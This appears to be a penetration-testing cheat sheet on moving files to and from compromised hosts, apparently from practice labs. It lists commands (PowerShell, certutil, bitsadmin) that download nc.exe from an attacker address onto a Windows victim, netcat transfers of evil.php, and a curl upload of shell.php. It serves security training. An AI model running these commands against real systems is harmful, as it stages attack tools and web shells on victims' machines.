# File Transfer

## Download

### HTTP Server with Python

```
python3 -m http.server 80
python2 -m SimpleHTTPServer 80
```

### Curl

```
curl -O http://host/file
```

### Powershell

```
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.17/nc.exe','c:\temp\nc.exe')

powershell.exe -c (Start-BitsTransfer -Source "http://10.10.14.17/nc.exe -Destination C:\temp\nc.exe")

powershell.exe wget "http://10.10.14.17/nc.exe" -outfile "c:\temp\nc.exe"
```

### Cetutil

```
certutil.exe -urlcache -split -f "http://10.10.14.17/nc.exe" c:\temp\nc.exe
```

### Bitsadmin

```
bitsadmin /transfer job /download /priority high http://10.10.14.17/nc.exe c:\temp\nc.exe
```

### Netcat

```
Attacker:
  nc -lvnp 443 < evil.php

Victim:
  nc -v 192.168.42.42 443 > evil.php
```

### SMB&#x20;

```
Attacker:
    python smbserver.py share .
Victom:
    copy \\10.10.14.21\share\whoami.exe .
```

### SCP

```
Attacker:
    scp charix@10.10.10.84:secret.zip ./

scp -r user@targetIP:/path/to/share /local/share
# remote to local
```

## Upload

### Curl

```
curl --upload-file shell.php --url http://$ip/shell.php --http1.0

scp /path/to/local/file.txt user@targetIP:/path/to/share
# local to remote
```

## Link

{% embed url="<https://isroot.nl/2018/07/09/post-exploitation-file-transfers-on-windows-the-manual-way/>" %}